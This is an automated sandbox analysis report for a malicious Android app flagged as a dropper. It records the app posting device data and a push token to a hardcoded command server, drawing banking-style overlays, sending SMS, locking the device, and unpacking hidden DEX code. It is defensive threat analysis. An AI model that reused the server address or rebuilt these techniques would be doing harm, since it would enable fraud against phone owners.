Loading ...

Analysis Report com.antonsilin.android.apps-v3.0.0.apk

Overview

General Information

Joe Sandbox Version:24.0.0 Fire Opal
Analysis ID:705305
Start date:07.11.2018
Start time:15:19:30
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 48s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:com.antonsilin.android.apps-v3.0.0.apk
Cookbook file name:defaultandroidfilecookbook.jbs
Analysis system description:Android x86 6.0 EEE PC
Detection:MAL
Classification:mal68.troj.spyw.expl.andAPK@0/253@47/0
Warnings:
Show All
  • No interacted views
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all resource files were parsed
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing dynamic data code.
  • Report size exceeded maximum capacity and may have missing network information.

Detection

StrategyScoreRangeReportingDetection
Threshold680 - 100Report FP / FNmalicious

Classification

Mitre Att&ck Matrix

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: com.antonsilin.android.apps-v3.0.0.apkAvira: Label: ANDROID/Dropper.FNDZ.Gen

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.34:45149 -> 178.132.78.51:84
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: ip-api.com
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 45149 -> 84
Source: unknownNetwork traffic detected: HTTP traffic on port 84 -> 45149
Checks an internet connection is availableShow sources
Source: com.google.firebase.iid.zzac;->run:91API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.iid.zzac;->run:91API Call: android.net.NetworkInfo.isConnected
Source: com.appsflyer.AppsFlyerLib;->getNetwork:546API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zzbca:492API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zzbca:492API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzckj;->zzbby:2641API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zzbby:2641API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzckj;->zzb:2558API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zzb:2558API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzckj;->zza:1759API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzckj;->zza:1759API Call: android.net.NetworkInfo.isConnected
Source: com.google.firebase.iid.zzac;->zzclv:104API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.iid.zzac;->zzclv:105API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzcjn;->zzaax:16API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzcjn;->zzaax:17API Call: android.net.NetworkInfo.isConnected
Source: utils.packed.com.scheduler.SmartScheduler;->isConnected:151API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: utils.packed.com.scheduler.SmartScheduler;->isConnected:152API Call: android.net.NetworkInfo.isConnectedOrConnecting
Source: utils.packed.com.scheduler.SmartScheduler;->isConnectionUnMetered:157API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.17.227
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.138
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.17.227
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.138
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 178.132.78.51
Source: unknownTCP traffic detected without corresponding DNS query: 178.132.78.51
Source: unknownTCP traffic detected without corresponding DNS query: 178.132.78.51
Source: unknownTCP traffic detected without corresponding DNS query: 178.132.78.51
Source: unknownTCP traffic detected without corresponding DNS query: 178.132.78.51
Source: unknownTCP traffic detected without corresponding DNS query: 178.132.78.51
Source: unknownTCP traffic detected without corresponding DNS query: 178.132.78.51
Connects to many different domainsShow sources
Source: unknownNetwork traffic detected: DNS query count 47
Loads a webpage with cache disabledShow sources
Source: webteam.displ.com.WvWrapper;->init:18API Call: android.webkit.WebSettings.setCacheMode
Opens an internet connectionShow sources
Source: utils.packed.com.rest.RestClient;->createConnection:9API Call: java.net.URL.openConnection("http://ip-api.com/json")
Source: utils.packed.com.rest.RestClient;->createConnection:9API Call: java.net.URL.openConnection("http://178.132.78.51:84/api/v2/device")
Source: com.appsflyer.AppsFlyerLib;->callServer:147API Call: java.net.URL.openConnection("https://t.appsflyer.com/api/v4/androidevent?buildnumber=4.7.4&app_id=com.antonsilin.android.apps")
Source: com.google.android.gms.internal.zzcjn;->zzb:37API Call: java.net.URL.openConnection("https://app-measurement.com/config/app/1%3A673516030624%3Aandroid%3A82c49bcc28702d1a?app_instance_id=d2192fa0671390bc68384e12103f1d5d&platform=android&gmp_version=12211")
Source: com.google.android.gms.internal.zzcjn;->zzb:37API Call: java.net.URL.openConnection("https://app-measurement.com/a")
Source: com.appsflyer.AppsFlyerLib$a;->run:53API Call: java.net.URL.openConnection (not executed)
Source: com.appsflyer.h;->doInBackground:32API Call: java.net.URL.openConnection (not executed)
Source: downloadmanager.DownloadDispatcher;->executeDownload:27API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.ads.identifier.zza;->run:16API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzas;->zza:49API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzcnq;->connect:9API Call: javax.net.ssl.SSLSocket.connect (not executed)
Source: com.google.android.gms.internal.zzcnq;->connect:11API Call: javax.net.ssl.SSLSocket.connect (not executed)
Source: utils.packed.com.utils.CommonUtils$1;->run:4API Call: java.net.URL.openConnection (not executed)
Performs DNS lookups (Java API)Show sources
Source: com.google.gson.internal.bind.TypeAdapters$23;->read:7API Call: java.net.InetAddress.getByName (not executed)
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Authorization: dee2cdd8a7942efaContent-Type: application/jsonUser-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; VirtualBox Build/MOB31E)Host: ip-api.comConnection: Keep-AliveAccept-Encoding: gzip
Found strings which match to known social media urlsShow sources
Source: loader-packed(4-2-1).encrypted.drString found in binary or memory: (.*youtube.*) equals www.youtube.com (Youtube)
Source: androidString found in binary or memory: com.facebook.katana equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: content://com.facebook.katana.provider.AttributionIdProvider equals www.facebook.com (Facebook)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: ip-api.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /api/v2/device HTTP/1.1Authorization: dee2cdd8a7942efaContent-Type: application/jsoncharset: utf-8Content-Length: 278User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; VirtualBox Build/MOB31E)Host: 178.132.78.51:84Connection: Keep-AliveAccept-Encoding: gzipData Raw: 7b 22 70 75 73 68 5f 74 6f 6b 65 6e 22 3a 22 65 7a 55 6c 38 57 4e 30 51 34 6b 3a 41 50 41 39 31 62 45 6d 33 4f 4c 74 70 47 55 7a 62 6b 69 74 41 77 44 48 48 77 61 49 51 59 62 38 33 41 42 63 6f 30 41 7a 4d 59 37 34 36 59 39 61 58 4e 63 67 63 39 6e 53 43 6e 36 35 58 43 73 6b 42 74 65 38 4b 37 41 4a 51 39 35 62 49 57 34 72 6f 67 66 47 56 44 67 5f 7a 5f 42 76 4f 4e 6b 64 54 51 39 43 38 68 44 49 72 79 61 56 43 38 6c 4f 6a 69 47 34 70 64 48 4b 4a 56 74 51 6e 66 79 47 63 5a 67 61 4b 64 68 52 61 53 69 75 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 73 61 6d 73 75 6e 67 20 47 61 6c 61 78 79 20 4e 65 78 75 73 20 2d 20 41 6e 64 72 6f 69 64 3a 20 32 33 20 28 34 2e 32 2e 31 29 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 74 61
Urls found in memory or binary dataShow sources
Source: resources.arscString found in binary or memory: http://178.132.78.51:84/api/v2/
Source: resources.arscString found in binary or memory: http://178.132.78.51:84/api/v2/$$https://my-apps-b19a2.firebaseio.com44https://www.finanzen100.de/de
Source: androidString found in binary or memory: http://178.132.78.51:84/api/v2/device
Source: androidString found in binary or memory: http://ip-api.com/json
Source: abc_tint_btn_checkable.xml, abc_select_dialog_material.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto
Source: common_google_signin_btn_icon_light_focused.xml, abc_tint_btn_checkable.xml, notification_action_background.xml, abc_screen_simple.xml, abc_search_view.xml, abc_ratingbar_small_material.xml, abc_select_dialog_material.xml, abc_action_menu_item_layout.xml, abc_alert_dialog_title_material.xml, abc_alert_dialog_button_bar_material.xml, abc_screen_simple_overlay_action_mode.xml, abc_slide_out_bottom.xml, abc_popup_menu_item_layout.xml, abc_expanded_menu_layout.xml, abc_ic_arrow_drop_right_black_24dp.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: androidString found in binary or memory: https://api.appsflyer.com/install_data/v3/
Source: androidString found in binary or memory: https://app-measurement.com/a
Source: androidString found in binary or memory: https://app-measurement.com/config/app/1%3A673516030624%3Aandroid%3A82c49bcc28702d1a?app_instance_id
Source: androidString found in binary or memory: https://events.appsflyer.com/api/v
Source: androidString found in binary or memory: https://goo.gl/NAOOOI
Source: androidString found in binary or memory: https://goo.gl/NAOOOI.
Source: androidString found in binary or memory: https://monitorsdk.appsflyer.com/remote-debug?app_id=
Source: androidString found in binary or memory: https://my-apps-b19a2.firebaseio.com
Source: androidString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=gmob-apps
Source: androidString found in binary or memory: https://plus.google.com/
Source: androidString found in binary or memory: https://register.appsflyer.com/api/v
Source: androidString found in binary or memory: https://sdk-services.appsflyer.com/validate-android-signature
Source: androidString found in binary or memory: https://stats.appsflyer.com/stats
Source: androidString found in binary or memory: https://t.appsflyer.com/api/v
Source: androidString found in binary or memory: https://t.appsflyer.com/api/v4/androidevent?buildnumber=4.7.4&app_id=com.antonsilin.android.apps
Source: androidString found in binary or memory: https://validate.appsflyer.com/api/v
Source: resources.arsc, androidString found in binary or memory: https://www.finanzen100.de/devisen/waehrungsrechner/
Source: androidString found in binary or memory: https://www.google.com
Source: androidString found in binary or memory: https://www.googleapis.com/auth/games
Source: androidString found in binary or memory: https://www.googleapis.com/auth/games_lite
Uses HTTP for connecting to the internetShow sources
Source: utils.packed.com.rest.RestClient;->makePostInner:50API Call: com.android.okhttp.internal.huc.HttpURLConnectionImpl.connect
Source: com.google.android.gms.internal.zzcjr;->run:35API Call: com.android.okhttp.internal.huc.HttpsURLConnectionImpl.connect
Source: com.appsflyer.AppsFlyerLib$a;->run:60API Call: java.net.HttpURLConnection.connect
Source: com.appsflyer.h;->doInBackground:59API Call: java.net.HttpURLConnection.connect
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 57716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47562
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59708
Source: unknownNetwork traffic detected: HTTP traffic on port 42682 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36394
Source: unknownNetwork traffic detected: HTTP traffic on port 47562 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 46600 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52496 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33322 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54568 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 35108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49516 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 48596 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47610 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
Source: unknownNetwork traffic detected: HTTP traffic on port 36394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54664
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33940
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33276
Source: unknownNetwork traffic detected: HTTP traffic on port 51480 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52370
Source: unknownNetwork traffic detected: HTTP traffic on port 58266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41162
Source: unknownNetwork traffic detected: HTTP traffic on port 57714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48596
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41160
Source: unknownNetwork traffic detected: HTTP traffic on port 44926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
Source: unknownNetwork traffic detected: HTTP traffic on port 46956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54556
Source: unknownNetwork traffic detected: HTTP traffic on port 38496 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46600
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46202
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39352
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57714
Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55416
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57716
Source: unknownNetwork traffic detected: HTTP traffic on port 54556 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54568
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57712
Source: unknownNetwork traffic detected: HTTP traffic on port 47812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46956
Source: unknownNetwork traffic detected: HTTP traffic on port 52370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52628 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47122
Source: unknownNetwork traffic detected: HTTP traffic on port 51484 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54664 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53004
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38496
Source: unknownNetwork traffic detected: HTTP traffic on port 55416 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47626 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57690
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59233
Source: unknownNetwork traffic detected: HTTP traffic on port 51478 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57692
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41412
Source: unknownNetwork traffic detected: HTTP traffic on port 57690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42464
Source: unknownNetwork traffic detected: HTTP traffic on port 41160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 39352 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41250
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51478
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51476
Source: unknownNetwork traffic detected: HTTP traffic on port 38164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51482
Source: unknownNetwork traffic detected: HTTP traffic on port 42124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51480
Source: unknownNetwork traffic detected: HTTP traffic on port 42684 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47626
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41244
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46258
Source: unknownNetwork traffic detected: HTTP traffic on port 56664 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51484
Source: unknownNetwork traffic detected: HTTP traffic on port 33276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 46202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49516
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42684
Source: unknownNetwork traffic detected: HTTP traffic on port 41162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47610
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42682
Source: unknownNetwork traffic detected: HTTP traffic on port 46258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52628
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41244 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56664
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33322
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43928
Source: unknownNetwork traffic detected: HTTP traffic on port 51482 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42679
Source: unknownNetwork traffic detected: HTTP traffic on port 42464 -> 443

E-Banking Fraud:

barindex
Has functionalty to add an overlay to other appsShow sources
Source: utils.packed.com.components.locker.LockerComponent$CheckService;->showOverlay:91API Call: WindowManager.addView
Loads a webpage with cache disabledShow sources
Source: webteam.displ.com.WvWrapper;->init:18API Call: android.webkit.WebSettings.setCacheMode

Spam, unwanted Advertisements and Ransom Demands:

barindex
May use Google Cloud Messaging (GCM) or Google's Cloud to Device Messaging (C2DM) servicesShow sources
Source: submitted apkRequest permission: com.antonsilin.android.apps.permission.C2D_MESSAGE
Sends SMS using SmsManagerShow sources
Source: utils.packed.com.components.TextComponent;->onSmsComeToSend:6API Call: android.telephony.SmsManager.sendTextMessage

Operating System Destruction:

barindex
Lists and deletes files in the same contextShow sources
Source: com.google.android.gms.internal.zzam;->initialize:108API Calls in same method context: File.listFiles,File.delete

Change of System Appearance:

barindex
May access the Android keyguard (lock screen)Show sources
Source: androidString found in binary or memory: keyguard
Acquires a wake lockShow sources
Source: com.google.firebase.iid.zzac;->run:82API Call: android.os.PowerManager$WakeLock.acquire
Source: com.google.android.gms.internal.zzcyz;->acquire:84API Call: android.os.PowerManager$WakeLock.acquire
Source: utils.packed.com.components.locker.LockerComponent$CheckService;->init:76API Call: android.os.PowerManager$WakeLock.acquire
Mutes ringtone soundShow sources
Source: utils.packed.com.components.locker.LockerComponent;->lockDevice:16API Call: android.media.AudioManager.setRingerMode("0")
Sets a repeating alarmShow sources
Source: utils.packed.com.scheduler.SmartScheduler;->addAlarmJob:27API Call: android.app.AlarmManager.setRepeating

System Summary:

barindex
Requests permissions only permitted to signed APKs or APKs which are within the system imageShow sources
Source: submitted apkRequest permission: android.permission.INSTALL_PACKAGES
Requests potentially dangerous permissionsShow sources
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Classification labelShow sources
Source: classification engineClassification label: mal68.troj.spyw.expl.andAPK@0/253@47/0
Reads shares settingsShow sources
Source: com.google.firebase.iid.zzaa;->zzq:85API Call: "|T|673516030624|*": null
Source: com.google.firebase.iid.zzaa;->zzrs:173API Call: "|S||P|": null
Source: com.google.firebase.iid.zzaa;->zzrs:177API Call: "|S||K|": null
Source: com.appsflyer.AppsFlyerProperties;->loadProperties:40API Call: "savedProperties": null
Source: com.google.android.gms.internal.zzcju;->zzbbe:65API Call: "gmp_app_id": null
Source: com.google.android.gms.internal.zzcjz;->zzbbj:6API Call: "app_instance_id": null
Source: com.google.android.gms.internal.zzcju;->zzbbi:96API Call: "previous_os_version": null
Source: com.appsflyer.AppsFlyerProperties;->getReferrer:27API Call: "referrer": null
Source: com.google.android.gms.ads.identifier.zzb;->getString:22API Call: "gads:ad_id_use_shared_preference:experiment_id":
Source: com.google.firebase.iid.zzaa;->zzcls:74API Call: "topic_operaion_queue": null
Source: com.appsflyer.k;->readInstallationSP:61API Call: "AF_INSTALLATION": null
Source: com.appsflyer.AppsFlyerLib;->addDeviceTracking:72API Call: "imeiCached": null
Source: com.google.firebase.iid.zzaa;->zzq:85API Call: "|T|673516030624|*": {"token":"ezUl8WN0Q4k:APA91bEm3OLtpGUzbkitAwDHHwaIQYb83ABco0AzMY746Y9aXNcgc9nSCn65XCskBte8K7AJQ95bIW4rogfGVDg_z_BvONkdTQ9C8hDIryaVC8lOjiG4pdHKJVtQnfyGcZgaKdhRaSiu","appVersion":"3","timestamp":1541640054690}
Source: com.appsflyer.AppsFlyerLib;->addDeviceTracking:100API Call: "androidIdCached": null
Source: com.appsflyer.AppsFlyerLib;->getFirstInstallDate:512API Call: "appsFlyerFirstInstall": null
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1405API Call: "attributionId": null
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1410API Call: "extraReferrers": null
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1490API Call: "sentSuccessfully":
Source: com.appsflyer.AppsFlyerLib;->callServer:246API Call: "attributionId": null
Source: com.appsflyer.AppsFlyerLib;->callServer:195API Call: android.content.SharedPreferences.getBoolean
Source: com.appsflyer.AppsFlyerLib;->callServer:258API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getCachedChannel:458API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getCachedStore:466API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getConversionData:485API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getPreInstallName:559API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->lastEventsProcessing:710API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->lastEventsProcessing:721API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->addReferrer:972API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1493API Call: android.content.SharedPreferences.getBoolean
Source: com.appsflyer.MultipleInstallBroadcastReceiver;->onReceive:13API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.SingleInstallBroadcastReceiver;->onReceive:13API Call: android.content.SharedPreferences.getString
Source: com.appsflyer.c;->getReferrer:13API Call: android.content.SharedPreferences.getString
Source: utils.packed.com.SdkManagerImpl;->getBaseApiUrl:52API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.ads.identifier.zzb;->getBoolean:10API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.iid.FirebaseInstanceId;->zzcli:125API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.iid.zzaa;->zzrl:90API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zzaa;->zzro:109API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zzaa;->zzrp:133API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzaf;->get:59API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzaf;->get:71API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzaf;->zzf:109API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.flags.impl.zzc;->call:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.flags.impl.zzi;->call:5API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzcju;->zzbap:50API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzcju;->zzbbg:77API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzcju;->zzbs:121API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzcjw;->get:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzcjy;->zzabh:47API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.auth.api.signin.internal.zzaa;->zzfg:88API Call: android.content.SharedPreferences.getString
Source: utils.packed.com.components.injects.mock.InjectHandler;->isInjectWasShowed:92API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.phenotype.zzs;->zzc:3API Call: android.content.SharedPreferences.getString

Data Obfuscation:

barindex
Unpacking routine for DEX file foundShow sources
Source: Lwebteam/displ/com/MyApp$Helper;-><init>(Lwebteam/displ/com/MyApp;Landroid/app/Application;)VInstruction: DexClassLoader and decryption
Found very long method stringsShow sources
Source: Lcom/google/android/gms/common/zzm;->zzahi()[BMethod string: 0\u0082\u0004\u00a80\u0082\u0003\u0090\u00a0\u0003\u0002\u0001\u0002\u0002\t\u0000\u00d5\u0085\u00b8l}\u00d3N\u00f50\r\u0006\t*\u0086H\u0086\u00f7\r\u0001\u0001\u0004\u0005\u00000\u0081\u00941\u000b0\t\u0006\u0003U\u0004\u0006\u0013\u0002US1\u00130\u0011\ Length: 4395
Obfuscates method namesShow sources
Source: com.antonsilin.android.apps-v3.0.0.apkTotal valid method names: 41%
Uses reflectionShow sources
Source: com.google.firebase.FirebaseApp;->zza:132API Call: Real call: null
Source: com.google.firebase.FirebaseApp;->zza:132API Call: Real call: public static synchronized com.google.firebase.iid.FirebaseInstanceId com.google.firebase.iid.FirebaseInstanceId.getInstance(com.google.firebase.FirebaseApp)
Source: com.google.firebase.FirebaseApp;->zza:132API Call: Real call: null
Source: com.google.firebase.FirebaseApp;->zza:132API Call: Real call: public static com.google.android.gms.measurement.AppMeasurement com.google.android.gms.measurement.AppMeasurement.getInstance(android.content.Context)
Source: com.google.android.gms.internal.zzcno;->zzkq:508API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String,java.lang.String)
Source: unknownAPI Call: Real call: public void android.view.ViewGroup.makeOptionalFitsSystemWindows()
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String)
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String)
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537API Call: Real call: null
Source: com.appsflyer.AppsFlyerLib;->getSystemProperty:1537API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String)
Source: com.google.android.gms.internal.zzckj;->zzbca:446API Call: Real call: public static java.lang.String android.os.SystemProperties.get(java.lang.String,java.lang.String)
Source: com.appsflyer.AppsFlyerLib;->addDeviceTracking:79API Call: java.lang.reflect.Method.invoke
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1566API Call: java.lang.reflect.Field.get
Source: com.appsflyer.a;->getGCMToken:209API Call: java.lang.reflect.Method.invoke
Source: com.appsflyer.a;->getGCMToken:213API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$1;->write:7API Call: java.lang.reflect.Field.get
